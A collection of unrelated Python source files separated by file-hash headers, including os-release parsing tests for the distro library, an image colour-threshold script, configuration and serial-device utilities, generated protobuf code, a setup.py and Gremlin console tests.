assert info["codename"] == ""
_distro = distro.LinuxDistribution(
include_lsb=False,
os_release_file="path-to-non-existing-file",
distro_release_file="path-to-non-existing-file",
)
info = _distro.info()
_test_none(info)
info = _distro.info(best=True)
_test_none(info)
info = _distro.info(pretty=True)
_test_none(info)
info = _distro.info(pretty=True, best=True)
_test_none(info)
def test_linux_distribution(self) -> None:
_distro = distro.LinuxDistribution(
include_lsb=False, os_release_file=self.ubuntu14_os_release
)
i = _distro.linux_distribution()
assert i == ("Ubuntu", "14.04", "Trusty Tahr")
_distro = distro.LinuxDistribution(
include_lsb=False, os_release_file=self.fedora30_os_release
)
i = _distro.linux_distribution()
assert i == ("Fedora", "30", "Thirty")
def test_linux_distribution_full_false(self) -> None:
_distro = distro.LinuxDistribution(
include_lsb=False, os_release_file=self.ubuntu14_os_release
)
i = _distro.linux_distribution(full_distribution_name=False)
assert i == ("ubuntu", "14.04", "Trusty Tahr")
def test_all(self) -> None:
"""Test info() by comparing its results with the results of specific
consolidated accessor functions.
"""
def _test_all(
info: distro.InfoDict, best: bool = False, pretty: bool = False
) -> None:
assert info["id"] == _distro.id()
assert info["version"] == _distro.version(pretty=pretty, best=best)
assert info["version_parts"]["major"] == _distro.major_version(best=best)
assert info["version_parts"]["minor"] == _distro.minor_version(best=best)
assert info["version_parts"]["build_number"] == _distro.build_number(
best=best
)
assert info["like"] == _distro.like()
assert info["codename"] == _distro.codename()
assert len(info["version_parts"]) == 3
assert len(info) == 5
for dist in DISTROS:
self._setup_for_distro(os.path.join(DISTROS_DIR, dist))
_distro = distro.LinuxDistribution()
info = _distro.info()
_test_all(info)
info = _distro.info(best=True)
_test_all(info, best=True)
info = _distro.info(pretty=True)
_test_all(info, pretty=True)
info = _distro.info(pretty=True, best=True)
_test_all(info, pretty=True, best=True)
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class TestOSReleaseParsing:
"""Test the parsing of os-release files."""
def setup_method(self, test_method: FunctionType) -> None:
self.distro = distro.LinuxDistribution(include_lsb=False)
def _get_props(self, input: str) -> Dict[str, str]:
return self.distro._parse_os_release_content(io.StringIO(input))
def _test_zero_length_props(self, input: str) -> None:
props = self._get_props(input)
assert len(props) == 0
def _test_empty_value(self, input: str) -> None:
props = self._get_props(input)
assert props.get("key", None) == ""
def _test_parsed_value(self, input: str) -> None:
props = self._get_props(input)
assert props.get("key", None) == "value"
def test_kv_01_empty_file(self) -> None:
self._test_zero_length_props("")
def test_kv_02_empty_line(self) -> None:
self._test_zero_length_props("\n")
def test_kv_03_empty_line_with_crlf(self) -> None:
self._test_zero_length_props("\r\n")
def test_kv_04_empty_line_with_just_cr(self) -> None:
self._test_zero_length_props("\r")
def test_kv_05_comment(self) -> None:
self._test_zero_length_props("# KEY=value\n")
def test_kv_06_empty_value(self) -> None:
self._test_empty_value("KEY=\n")
def test_kv_07_empty_value_single_quoted(self) -> None:
self._test_empty_value("KEY=''\n")
def test_kv_08_empty_value_double_quoted(self) -> None:
self._test_empty_value('KEY=""\n')
def test_kv_09_word(self) -> None:
self._test_parsed_value("KEY=value\n")
def test_kv_10_word_no_newline(self) -> None:
self._test_parsed_value("KEY=value")
def test_kv_11_word_with_crlf(self) -> None:
self._test_parsed_value("KEY=value\r\n")
def test_kv_12_word_with_just_cr(self) -> None:
self._test_parsed_value("KEY=value\r")
def test_kv_13_word_with_multi_blanks(self) -> None:
self._test_empty_value("KEY= cmd \n")
# Note: Without quotes, this assigns the empty string, and 'cmd' is
# a separate token that is being ignored (it would be a command
# in the shell).
def test_kv_14_unquoted_words(self) -> None:
self._test_parsed_value("KEY=value cmd\n")
def test_kv_15_double_quoted_words(self) -> None:
props = self._get_props('KEY="a simple value" cmd\n')
assert props.get("key", None) == "a simple value"
def test_kv_16_double_quoted_words_with_multi_blanks(self) -> None:
props = self._get_props('KEY=" a simple value "\n')
assert props.get("key", None) == " a simple value "
def test_kv_17_double_quoted_word_with_single_quote(self) -> None:
props = self._get_props('KEY="it\'s value"\n')
assert props.get("key", None) == "it's value"
def test_kv_18_double_quoted_word_with_double_quote(self) -> None:
props = self._get_props('KEY="a \\"bold\\" move"\n')
assert props.get("key", None) == 'a "bold" move'
def test_kv_19_single_quoted_words(self) -> None:
props = self._get_props("KEY='a simple value'\n")
assert props.get("key", None) == "a simple value"
def test_kv_20_single_quoted_words_with_multi_blanks(self) -> None:
props = self._get_props("KEY=' a simple value '\n")
assert props.get("key", None) == " a simple value "
def test_kv_21_single_quoted_word_with_double_quote(self) -> None:
props = self._get_props("KEY='a \"bold\" move'\n")
assert props.get("key", None) == 'a "bold" move'
def test_kv_22_quoted_unicode_wordchar(self) -> None:
# "wordchar" means it is in the shlex.wordchars variable.
props = self._get_props('KEY="wordchar: \u00CA (E accent grave)"\n')
assert props.get("key", None) == "wordchar: \u00CA (E accent grave)"
def test_kv_23_quoted_unicode_non_wordchar(self) -> None:
# "non-wordchar" means it is not in the shlex.wordchars variable.
props = self._get_props(
'KEY="non-wordchar: \u00A1 (inverted exclamation mark)"\n'
)
assert (
props.get("key", None) == "non-wordchar: \u00A1 (inverted exclamation mark)"
)
def test_kv_24_double_quoted_entire_single_quoted_word(self) -> None:
props = self._get_props("KEY=\"'value'\"\n")
assert props.get("key", None) == "'value'"
def test_kv_25_single_quoted_entire_double_quoted_word(self) -> None:
props = self._get_props("KEY='\"value\"'\n")
assert props.get("key", None) == '"value"'
def test_kv_26_double_quoted_multiline(self) -> None:
props = self.distro._parse_os_release_content(
io.StringIO('KEY="a multi\n' 'line value"\n')
)
assert props.get("key", None) == "a multi\nline value"
# TODO: Find out why the result is not 'a multi line value'
def test_kv_27_double_quoted_multiline_2(self) -> None:
props = self._get_props("KEY=' a simple value '\n")
props = self.distro._parse_os_release_content(
io.StringIO('KEY="a multi\n' 'line=value"\n')
)
assert props.get("key", None) == "a multi\nline=value"
# TODO: Find out why the result is not 'a multi line=value'
def test_kv_28_double_quoted_word_with_equal(self) -> None:
props = self._get_props('KEY="var=value"\n')
assert props.get("key", None) == "var=value"
def test_kv_29_single_quoted_word_with_equal(self) -> None:
props = self._get_props("KEY='var=value'\n")
assert props.get("key", None) == "var=value"
def test_kx_01(self) -> None:
props = self.distro._parse_os_release_content(
io.StringIO("KEY1=value1\n" 'KEY2="value 2"\n')
)
assert props.get("key1", None) == "value1"
assert props.get("key2", None) == "value 2"
def test_kx_02(self) -> None:
props = self.distro._parse_os_release_content(
io.StringIO("# KEY1=value1\n" 'KEY2="value 2"\n')
)
assert props.get("key1", None) is None
assert props.get("key2", None) == "value 2"
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class TestGlobal:
"""Test the global module-level functions, and default values of their
arguments.
"""
def setup_method(self, test_method: FunctionType) -> None:
pass
def test_global(self) -> None:
# Because the module-level functions use the module-global
# LinuxDistribution instance, it would influence the tested
# code too much if we mocked that in order to use the distro
# specific release files. Instead, we let the functions use
# the release files of the distro this test runs on, and
# compare the result of the global functions with the result
# of the methods on the global LinuxDistribution object.
def _test_consistency(
function: str, kwargs: Optional[Dict[str, Any]] = None
) -> None:
kwargs = kwargs or {}
method_result = getattr(MODULE_DISTRO, function)(**kwargs)
function_result = getattr(distro, function)(**kwargs)
assert method_result == function_result
kwargs = {"full_distribution_name": True}
with pytest.deprecated_call():
_test_consistency("linux_distribution", kwargs)
kwargs = {"full_distribution_name": False}
with pytest.deprecated_call():
_test_consistency("linux_distribution", kwargs)
kwargs = {"pretty": False}
_test_consistency("name", kwargs)
_test_consistency("version", kwargs)
_test_consistency("info", kwargs)
kwargs = {"pretty": True}
_test_consistency("name", kwargs)
_test_consistency("version", kwargs)
_test_consistency("info", kwargs)
kwargs = {"best": False}
_test_consistency("version", kwargs)
_test_consistency("version_parts", kwargs)
_test_consistency("major_version", kwargs)
_test_consistency("minor_version", kwargs)
_test_consistency("build_number", kwargs)
_test_consistency("info", kwargs)
kwargs = {"best": True}
_test_consistency("version", kwargs)
_test_consistency("version_parts", kwargs)
_test_consistency("major_version", kwargs)
_test_consistency("minor_version", kwargs)
_test_consistency("build_number", kwargs)
_test_consistency("info", kwargs)
_test_consistency("id")
_test_consistency("like")
_test_consistency("codename")
_test_consistency("info")
_test_consistency("os_release_info")
_test_consistency("lsb_release_info")
_test_consistency("distro_release_info")
_test_consistency("uname_info")
os_release_keys = [
"name",
"version",
"id",
"id_like",
"pretty_name",
"version_id",
"codename",
]
for key in os_release_keys:
_test_consistency("os_release_attr", {"attribute": key})
lsb_release_keys = ["distributor_id", "description", "release", "codename"]
for key in lsb_release_keys:
_test_consistency("lsb_release_attr", {"attribute": key})
distro_release_keys = ["id", "name", "version_id", "codename"]
for key in distro_release_keys:
_test_consistency("distro_release_attr", {"attribute": key})
uname_keys = ["id", "name", "release"]
for key in uname_keys:
_test_consistency("uname_attr", {"attribute": key})
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class TestRepr:
"""Test the __repr__() method."""
def test_repr(self) -> None:
# We test that the class name and the names of all instance attributes
# show up in the repr() string.
repr_str = repr(distro._distro)
assert "LinuxDistribution" in repr_str
for attr in MODULE_DISTRO.__dict__.keys():
if attr in ("root_dir", "etc_dir", "usr_lib_dir"):
continue
assert f"{attr}=" in repr_str
|
py | b40b3b25beeed99b7b72c35a7a5e5632f8421789 | import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
# Read in the image and print out some stats
image = mpimg.imread('test.jpg')
print('This image is: ',type(image),
'with dimensions:', image.shape)
# Grab the x and y size and make a copy of the image
ysize = image.shape[0]
xsize = image.shape[1]
# Note: always make a copy rather than simply using "="
color_select = np.copy(image)
# Define our color selection criteria
# Note: if you run this code, you'll find these are not sensible values!!
# But you'll get a chance to play with them soon in a quiz
red_threshold = 200
green_threshold = 200
blue_threshold = 200
rgb_threshold = [red_threshold, green_threshold, blue_threshold]
# Identify pixels below the threshold
thresholds = (image[:,:,0] < rgb_threshold[0]) \
| (image[:,:,1] < rgb_threshold[1]) \
| (image[:,:,2] < rgb_threshold[2])
color_select[thresholds] = [0,0,0]
# Display the image
plt.imshow(color_select)
plt.show()
|
py | b40b3c45cc6eb2951ada60b405553a7119d18a4d | import json
import logging
import json
import os
DEFAULT = {
# UDP config
"UDP_RCV_IP": "",
"UDP_RCV_PORT": 8080,
"UDP_SND_IP": "255.255.255.255",
"UDP_SND_PORT": 8080,
# BloomFilter config
"BF_BITS": 800000,
"BF_NHASHFUNS": 3,
"BF_ARRSZ_BITS": 8,
# BloomFilter Manager config
"BFMGR_INIT_NDBFS": 6,
"BFMGR_MAX_DBF_POOLSZ": 6,
"BFMGR_LOGLEVEL": logging.INFO,
# BackGround Worker config
"BGWRK_LOGLEVEL": logging.INFO,
# Background Task config
"BG_GEN_EphID_SECS": 60,
"BG_SHARE_EphID_SECS": 10,
"BG_RECV_CHECK_SECS": 10,
"BG_DBF_MOVE_TO_NEXT": 600,
"BG_DBFPOOL_UPDATE_SECS": 600,
"BG_QBF_GEN_SECS": 3600,
# Server config
"URL_TEMPLATE": "http://ec2-3-26-37-172.ap-southeast-2.compute.amazonaws.com:9000/comp4337/{0}",
"URL_SUFFIX": {
"UPLOAD": "cbf/upload",
"QUERY": "qbf/query"
},
# Debugging config
"STDOUT_LOGLEVEL": logging.INFO,
"ALL_LOG_LEVEL": logging.INFO,
"DEBUG_MODE": True,
"ALL_LOG_FILE": "log.txt",
# MISC config
# Shamir Algo config
"NUM_SECRET_PARTS": 6,
"NUM_THRESHOLD": 3
}
def dump_default_json(filepath):
with open(filepath, "w") as f:
json.dump(DEFAULT, f, indent=4)
# load the user given configurations
def load_grp03_global_config(filepath=None):
if (not filepath):
filepath = "./default_conf.json"
dump_default_json(filepath)
print(f"NOTICE: Using default configuration, the config is dumping to {os.path.abspath(filepath)}\n")
return DEFAULT
# try open the file, let it fail if not exist
with open(filepath, "r") as f:
config = json.load(f)
# verify important keys
for k in DEFAULT.keys():
if (k not in config.keys()):
raise ValueError(f"Missing configuration entry key : {k}")
print(f"Using custom configuration file {os.path.abspath(filepath)}")
return config |
py | b40b3ce6b3782cef768ad13a5c783e9e5dd79e1a | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Eny command"""
from __future__ import print_function
import argparse
import glob
import collections
import sys
import re
import serial
import threading
__version__ = '0.5.0'
Eny = collections.namedtuple('Eny', 'id cumulated')
RESULT_CODE = {
'00': 'Success',
'02': 'Too few arguments',
'03': 'Too many arguments',
'05': 'Invalid value',
'07': 'Table full',
'08': 'Already registerd',
}
class DoubleClick(object):
"""Check double click."""
def __init__(self, single_click, double_click, wait_time=1.0):
self.single_click = single_click
self.double_click = double_click
self.wait_time = wait_time
self.timer = threading.Timer(self.wait_time, self.on_timer)
self.last = None
def on_click(self, eny_obj):
"""Click handler"""
if self.last is not None and self.last.id == eny_obj.id:
# 2
self.double_click(eny_obj)
self.last = None
self.timer.cancel()
else:
if self.last is not None and self.last.id != eny_obj.id:
self.single_click(self.last)
self.last = eny_obj
self.timer.cancel()
self.timer = threading.Timer(self.wait_time, self.on_timer)
self.timer.start()
def on_timer(self):
"""timer"""
self.single_click(self.last)
self.last = None
def parse(line):
"""Parse string from eny serial
Args:
line (str): The UART text
Returns:
Eny: Eny named tuple
"""
line = str(line)
if not line.startswith('rcv ok : '):
return None
line = line.replace('rcv ok : ', '')
line = line.translate(None, ' ')
line = line.translate(None, '\r\n')
pairs = line.split(',')
if len(pairs) < 3:
return None
kvs = dict(pair.split('=') for pair in pairs)
return Eny(id=kvs['cid'],
cumulated=int(kvs['cum_no'], 16))
def get_port_names():
"""Returns available serial ports."""
if sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
ports = glob.glob('/dev/ttyUSB*')
elif sys.platform.startswith('darwin'):
ports = glob.glob('/dev/tty.usbserial*')
else:
raise EnvironmentError('Unsupported platform')
if len(ports) is 0:
raise EnvironmentError('eny not connected')
return ports
def handle_click(uart, handler):
"""Listen eny event"""
try:
print(u'Ctl-c to exit')
while True:
line = uart.readline()
eny_obj = parse(line)
if eny_obj != None:
handler(eny_obj)
except KeyboardInterrupt:
print(u' - Quitting')
def handle_double_click(uart, single_click, double_click, wait_time=0.8):
"""Listen eny event with Double click"""
handler = DoubleClick(single_click, double_click, wait_time)
handle_click(uart, handler.on_click)
def main():
"""Eny command line"""
args = _init_parser()
if args.port is None:
args.port = get_port_names()[0]
cmd = args.which
if cmd == 'pair add':
cmd += ' ' + args.device_id
elif cmd == 'pair del':
cmd += ' ' + str(args.device_index)
with serial.Serial(args.port, args.baudrate) as uart:
if cmd == 'listen':
handle_click(uart, print)
else:
has_result_code = re.compile(r'pair add|del|reset')
uart.write(cmd + '\r\n')
uart.timeout = 0.5
line = None
while line != '':
line = uart.readline()
if line == '\r' or len(line) is 0:
continue
elif has_result_code.search(cmd) is not None:
code = line.split(' ')[0]
print(RESULT_CODE[code])
else:
print(line)
uart.flush()
uart.close()
def _init_parser():
"""Initialize argument parser"""
parser = argparse.ArgumentParser(description='Eny client')
# eny -port /dev/ttyUSB*
parser.add_argument(
'--port',
default=None,
type=str,
nargs=1,
help='Port name like /dev/ttyUSB*')
# eny -baudrate 115200
parser.add_argument(
'--baudrate',
default=115200,
type=int,
nargs=1,
help='baudrate, default: %(default)s')
sub = parser.add_subparsers()
# eny get_id
get_id = sub.add_parser(
'get_id',
description='Shown own TX ID. ID is 8-digit hexadecimal number.')
get_id.set_defaults(which='get_id')
# eny listen
listen = sub.add_parser(
'listen',
description='Listen raw UART')
listen.set_defaults(which='listen')
# eny pair
pair = sub.add_parser(
'pair',
description='Pair commands').add_subparsers()
# eny pair view
pair_view = pair.add_parser(
'view',
description='Shown current pairing list.')
pair_view.set_defaults(which='pair view')
# eny pair add FFFFFFFF
pair_add = pair.add_parser(
'add',
description='Add a pairing ID to the pairing list.'
+ ' (Then need a vcant space of the list.)')
pair_add.set_defaults(which='pair add')
pair_add.add_argument(
'device_id',
type=str,
help='ID is 8-digit hexadecimal number.(00000001~fffffffe)')
# eny pair del 31
pair_del = pair.add_parser(
'del',
description='Delete a pairing ID from the pairing lsit.')
pair_del.set_defaults(which='pair del')
pair_del.add_argument(
'device_index',
type=int,
choices=range(0, 32),
help='Input is a table number.(0~31)')
# eny pair reset
pair_reset = pair.add_parser(
'reset',
description='Reset pair list')
pair_reset.set_defaults(which='pair reset')
return parser.parse_args()
if __name__ == '__main__':
main()
|
py | b40b3e17303e2a222b52b25eb33ace3035b587e2 | # generated from genmsg/cmake/pkg-genmsg.context.in
messages_str = "/home/su/bw_ws/src/px-ros-pkg/px_comm/msg/CameraInfo.msg;/home/su/bw_ws/src/px-ros-pkg/px_comm/msg/Mavlink.msg;/home/su/bw_ws/src/px-ros-pkg/px_comm/msg/OpticalFlow.msg"
services_str = "/home/su/bw_ws/src/px-ros-pkg/px_comm/srv/SetCameraInfo.srv"
pkg_name = "px_comm"
dependencies_str = "geometry_msgs;std_msgs"
langs = "gencpp;geneus;genlisp;gennodejs;genpy"
dep_include_paths_str = "px_comm;/home/su/bw_ws/src/px-ros-pkg/px_comm/msg;geometry_msgs;/opt/ros/kinetic/share/geometry_msgs/cmake/../msg;std_msgs;/opt/ros/kinetic/share/std_msgs/cmake/../msg"
PYTHON_EXECUTABLE = "/usr/bin/python2"
package_has_static_sources = '' == 'TRUE'
genmsg_check_deps_script = "/opt/ros/kinetic/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py"
|
py | b40b3f0f295efddc301d13d68cdd2310731d633b | import logging
from time import sleep
import pandas as pd
from sklearn.model_selection import train_test_split
from seldon_core.seldon_client import SeldonClient
import numpy as np
df_cols = ["prev_idx", "parent_idx", "body", "removed"]
df = pd.read_csv(
"https://raw.githubusercontent.com/axsauze/reddit-classification-exploration/master/data/reddit_train.csv",
names=df_cols,
skiprows=1,
encoding="ISO-8859-1",
)
df.head()
x = df["body"].values
y = df["removed"].values
logging.info("Train test split.")
_, x_test, _, _ = train_test_split(
x, y, stratify=y, random_state=42, test_size=0.1, shuffle=True
)
sc = SeldonClient(
gateway="ambassador",
transport="rest",
gateway_endpoint="localhost:8080",
namespace="seldon",
)
def send_client_request(test_text):
client_prediction = sc.predict(
data=np.array([test_text]),
deployment_name="abtest",
names=["text"],
payload_type="ndarray",
)
print(client_prediction)
return client_prediction
for i in range(len(x_test)):
to_classify_text = x_test[i]
prediction = send_client_request(to_classify_text)
sleep(0.5)
|
py | b40b3f40605d8bc52f2917a15532298f22a1d326 | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v2/proto/errors/feed_item_error.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v2/proto/errors/feed_item_error.proto',
package='google.ads.googleads.v2.errors',
syntax='proto3',
serialized_options=_b('\n\"com.google.ads.googleads.v2.errorsB\022FeedItemErrorProtoP\001ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v2/errors;errors\242\002\003GAA\252\002\036Google.Ads.GoogleAds.V2.Errors\312\002\036Google\\Ads\\GoogleAds\\V2\\Errors\352\002\"Google::Ads::GoogleAds::V2::Errors'),
serialized_pb=_b('\n:google/ads/googleads_v2/proto/errors/feed_item_error.proto\x12\x1egoogle.ads.googleads.v2.errors\x1a\x1cgoogle/api/annotations.proto\"\x87\x03\n\x11\x46\x65\x65\x64ItemErrorEnum\"\xf1\x02\n\rFeedItemError\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x0b\n\x07UNKNOWN\x10\x01\x12.\n*CANNOT_CONVERT_ATTRIBUTE_VALUE_FROM_STRING\x10\x02\x12\'\n#CANNOT_OPERATE_ON_REMOVED_FEED_ITEM\x10\x03\x12*\n&DATE_TIME_MUST_BE_IN_ACCOUNT_TIME_ZONE\x10\x04\x12\x1c\n\x18KEY_ATTRIBUTES_NOT_FOUND\x10\x05\x12\x0f\n\x0bINVALID_URL\x10\x06\x12\x1a\n\x16MISSING_KEY_ATTRIBUTES\x10\x07\x12\x1d\n\x19KEY_ATTRIBUTES_NOT_UNIQUE\x10\x08\x12%\n!CANNOT_MODIFY_KEY_ATTRIBUTE_VALUE\x10\t\x12,\n(SIZE_TOO_LARGE_FOR_MULTI_VALUE_ATTRIBUTE\x10\nB\xed\x01\n\"com.google.ads.googleads.v2.errorsB\x12\x46\x65\x65\x64ItemErrorProtoP\x01ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v2/errors;errors\xa2\x02\x03GAA\xaa\x02\x1eGoogle.Ads.GoogleAds.V2.Errors\xca\x02\x1eGoogle\\Ads\\GoogleAds\\V2\\Errors\xea\x02\"Google::Ads::GoogleAds::V2::Errorsb\x06proto3')
,
dependencies=[google_dot_api_dot_annotations__pb2.DESCRIPTOR,])
_FEEDITEMERRORENUM_FEEDITEMERROR = _descriptor.EnumDescriptor(
name='FeedItemError',
full_name='google.ads.googleads.v2.errors.FeedItemErrorEnum.FeedItemError',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=1, number=1,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CANNOT_CONVERT_ATTRIBUTE_VALUE_FROM_STRING', index=2, number=2,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CANNOT_OPERATE_ON_REMOVED_FEED_ITEM', index=3, number=3,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DATE_TIME_MUST_BE_IN_ACCOUNT_TIME_ZONE', index=4, number=4,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KEY_ATTRIBUTES_NOT_FOUND', index=5, number=5,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_URL', index=6, number=6,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MISSING_KEY_ATTRIBUTES', index=7, number=7,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KEY_ATTRIBUTES_NOT_UNIQUE', index=8, number=8,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CANNOT_MODIFY_KEY_ATTRIBUTE_VALUE', index=9, number=9,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SIZE_TOO_LARGE_FOR_MULTI_VALUE_ATTRIBUTE', index=10, number=10,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=147,
serialized_end=516,
)
_sym_db.RegisterEnumDescriptor(_FEEDITEMERRORENUM_FEEDITEMERROR)
_FEEDITEMERRORENUM = _descriptor.Descriptor(
name='FeedItemErrorEnum',
full_name='google.ads.googleads.v2.errors.FeedItemErrorEnum',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_FEEDITEMERRORENUM_FEEDITEMERROR,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=125,
serialized_end=516,
)
_FEEDITEMERRORENUM_FEEDITEMERROR.containing_type = _FEEDITEMERRORENUM
DESCRIPTOR.message_types_by_name['FeedItemErrorEnum'] = _FEEDITEMERRORENUM
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
FeedItemErrorEnum = _reflection.GeneratedProtocolMessageType('FeedItemErrorEnum', (_message.Message,), dict(
DESCRIPTOR = _FEEDITEMERRORENUM,
__module__ = 'google.ads.googleads_v2.proto.errors.feed_item_error_pb2'
,
__doc__ = """Container for enum describing possible feed item errors.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.errors.FeedItemErrorEnum)
))
_sym_db.RegisterMessage(FeedItemErrorEnum)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
py | b40b3f8d99629397d102c45e2e30b33ecf7daf5f | from .reconstruction_GA import *
from .reconstruction_single import *
from .reconstruction_multi import *
from .phasing import * |
py | b40b3fe85ab828b0899975525b2ad21b9a55fddd | from output.models.ms_data.particles.particles_l023_xsd.particles_l023 import (
B,
R,
Doc,
)
__all__ = [
"B",
"R",
"Doc",
]
|
py | b40b3ff3e7cb3c833e89cf1833dc6ffd3008323b | import sys
from tests.support.case import ModuleCase
from tests.support.helpers import destructiveTest
from tests.support.unit import skipIf
class SysrcModuleTest(ModuleCase):
def setUp(self):
super().setUp()
ret = self.run_function("cmd.has_exec", ["sysrc"])
if not ret:
self.skipTest("sysrc not found")
@skipIf(not sys.platform.startswith("freebsd"), "FreeBSD specific")
def test_show(self):
ret = self.run_function("sysrc.get")
self.assertIsInstance(
ret, dict, "sysrc.get returned wrong type, expecting dictionary"
)
self.assertIn(
"/etc/rc.conf", ret, "sysrc.get should have an rc.conf key in it."
)
@skipIf(not sys.platform.startswith("freebsd"), "FreeBSD specific")
@destructiveTest
def test_set(self):
ret = self.run_function("sysrc.set", ["test_var", "1"])
self.assertIsInstance(
ret, dict, "sysrc.get returned wrong type, expecting dictionary"
)
self.assertIn(
"/etc/rc.conf", ret, "sysrc.set should have an rc.conf key in it."
)
self.assertIn(
"1",
ret["/etc/rc.conf"]["test_var"],
"sysrc.set should return the value it set.",
)
ret = self.run_function("sysrc.remove", ["test_var"])
self.assertEqual("test_var removed", ret)
@skipIf(not sys.platform.startswith("freebsd"), "FreeBSD specific")
@destructiveTest
def test_set_bool(self):
ret = self.run_function("sysrc.set", ["test_var", True])
self.assertIsInstance(
ret, dict, "sysrc.get returned wrong type, expecting dictionary"
)
self.assertIn(
"/etc/rc.conf", ret, "sysrc.set should have an rc.conf key in it."
)
self.assertIn(
"YES",
ret["/etc/rc.conf"]["test_var"],
"sysrc.set should return the value it set.",
)
ret = self.run_function("sysrc.remove", ["test_var"])
self.assertEqual("test_var removed", ret)
|
py | b40b40909d1fa67c4c6a30b7e82a7a6ab8a454fb | #!/usr/bin/env python
# coding: utf-8
"""
setup.py
~~~~~~~~~~
"""
from setuptools import setup
import unittest
def alipay_test_suite():
test_loader = unittest.TestLoader()
test_suite = test_loader.discover('tests')
return test_suite
setup(
name="python-alipay-sdk",
version="3.0.1",
author="fzlee",
author_email="[email protected]",
description="Python SDK for AliPay, RSA is the only sign method we support",
license="BSD",
keywords="python sdk alipay",
url="https://github.com/fzlee/alipay",
packages=['alipay'],
classifiers=[
"Development Status :: 3 - Alpha",
"Topic :: Utilities",
"License :: OSI Approved :: BSD License",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
],
install_requires=["pycryptodomex==3.9.4", "pyOpenSSL==19.1.0"],
test_suite="setup.alipay_test_suite"
)
|
py | b40b41453253980e2f3985aed595463e61d826b9 | '''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
'''
import pexpect
class TestConsole(object):
# the base command must pass -C because if colors are enabled pexpect gets garbled input and tests won't pass
gremlinsh = "bash gremlin-console/bin/gremlin.sh -C "
def test_basic_console_operations(self):
child = pexpect.spawn(TestConsole.gremlinsh)
TestConsole._expect_gremlin_header(child)
TestConsole._send(child, "1-1")
child.expect("==>0\r\n")
TestConsole._expect_prompt(child)
TestConsole._close(child)
def test_just_dash_i(self):
child = pexpect.spawn(TestConsole.gremlinsh + "-i x.script")
TestConsole._expect_gremlin_header(child)
TestConsole._send(child, "x")
child.expect("==>2\r\n")
TestConsole._expect_prompt(child)
TestConsole._close(child)
def test_just_dash_dash_interactive(self):
child = pexpect.spawn(TestConsole.gremlinsh + "--interactive x.script")
TestConsole._expect_gremlin_header(child)
TestConsole._send(child, "x")
child.expect("==>2\r\n")
TestConsole._expect_prompt(child)
TestConsole._close(child)
def test_dash_i_with_args(self):
child = pexpect.spawn(TestConsole.gremlinsh + "-i y.script 1 2 3")
TestConsole._expect_gremlin_header(child)
TestConsole._send(child, "y")
child.expect("==>6\r\n")
TestConsole._expect_prompt(child)
TestConsole._close(child)
def test_dash_dash_interactive_with_args(self):
child = pexpect.spawn(TestConsole.gremlinsh + "--interactive y.script 1 2 3")
TestConsole._expect_gremlin_header(child)
TestConsole._send(child, "y")
child.expect("==>6\r\n")
TestConsole._expect_prompt(child)
TestConsole._close(child)
def test_dash_dash_interactive_with_args_and_equals(self):
child = pexpect.spawn(TestConsole.gremlinsh + "--interactive=\"y.script 1 2 3\"")
TestConsole._expect_gremlin_header(child)
TestConsole._send(child, "y")
child.expect("==>6\r\n")
TestConsole._expect_prompt(child)
TestConsole._close(child)
def test_dash_i_multiple_scripts(self):
child = pexpect.spawn(TestConsole.gremlinsh + "-i y.script 1 2 3 -i x.script -i \"z.script x -i = --color -D\"")
TestConsole._expect_gremlin_header(child)
TestConsole._send(child, "y")
child.expect("==>6\r\n")
TestConsole._expect_prompt(child)
TestConsole._send(child, "x")
child.expect("==>2\r\n")
